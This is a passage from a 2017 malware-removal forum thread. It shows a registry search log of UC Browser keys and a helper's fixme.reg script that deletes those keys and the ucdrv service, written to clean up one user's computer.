@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.SHTM\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.SHTM\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.SHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.SHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.WEBP\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.WEBP\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.XHT\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.XHT\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.XHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.XHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Clients\StartMenuInternet]
@="UCBrowser"
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Applications\UCBrowser]
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\17e18612_0]
@="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0283&subsys_1025091b&rev_1000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\singlelineouttopo/00010001|\Device\HarddiskVolume6\Program Files (x86)\UCBrowser\Application\UCBrowser.exe%b{00000000-0000-0000-0000-000000000000}"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001_Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001_Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001_Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\ftp\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\ftp\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\http\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\http\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\https\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\https\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,1"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.CRX\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,4"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.CRX\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.HTM\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.HTM\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.HTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.HTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.MHT\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.MHT\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.SHTM\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.SHTM\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.SHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.SHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.WEBP\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.WEBP\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.XHT\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.XHT\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.XHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.XHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Clients\StartMenuInternet]
@="UCBrowser"
[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Applications\UCBrowser]

Searching for "ucdrv_repair"
No data found.

-= EOF =-



#10 Pfoertner

Pfoertner
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:12:37 PM

Posted 14 February 2017 - 03:11 PM

But Malware is still there ;)



#11 nasdaq

nasdaq

  • Malware Response Team
  • 39,578 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:37 AM

Posted 15 February 2017 - 08:23 AM

Me must remove these items from the registry.

Copy the text IN THE QUOTE BOX below to notepad. Save it as fixme.reg to your desktop.
Be sure the "Save as" type is set to "all files" Once you have saved Right click the .reg file and allow it to merge with the registry.
 

Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\17e18612_0]
[-HKEY_CURRENT_USER\Software\UCBrowser]
[-HKEY_CURRENT_USER\Software\Classes\UCHTML]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser]
[-HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\MediaPlayer\ShimInclusionList\UCBrowser.exe]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\RegisteredApplications]
"UCBrowser"=-
[-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ucdrv]
[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ucdrv]
[HKEY_USERS\.DEFAULT\Software\Classes\ftp\DefaultIcon]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\ftp\shell\open\command]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\http\DefaultIcon]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\http\shell\open\command]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\https\DefaultIcon]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\https\shell\open\command]
@=-
[-HKEY_USERS\.DEFAULT\Software\Classes\UCHTML]
[HKEY_USERS\.DEFAULT\Software\Clients\StartMenuInternet]
@=-
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Applications\UCBrowser]
[-HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Classes\UCHTML]
[-HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001_Classes\UCHTML]
[HKEY_USERS\S-1-5-18\Software\Classes\ftp\DefaultIcon]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\ftp\shell\open\command]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\http\DefaultIcon]
@=
[HKEY_USERS\S-1-5-18\Software\Classes\http\shell\open\command]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\https\DefaultIcon]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\https\shell\open\command]
@=-
[-HKEY_USERS\S-1-5-18\Software\Classes\UCHTML]
[HKEY_USERS\S-1-5-18\Software\Clients\StartMenuInternet]
@=-
[-HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Applications\UCBrowser]


Restart the computer when completed.

You can delete the fixme.reg file when done.
===

Let me know what problems persists with this computer.

There might still be some remnant items but the UCBrowser should be gone.

#12 nasdaq

nasdaq

  • Malware Response Team
  • 39,578 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:37 AM

Posted 20 February 2017 - 09:11 AM

Are you still with me?

#13 Pfoertner

Pfoertner
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:12:37 PM

Posted 21 February 2017 - 10:15 AM

Hello Nasdaq, I am currently not at home but will come back tomorrow! I'll let you know the progress!






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users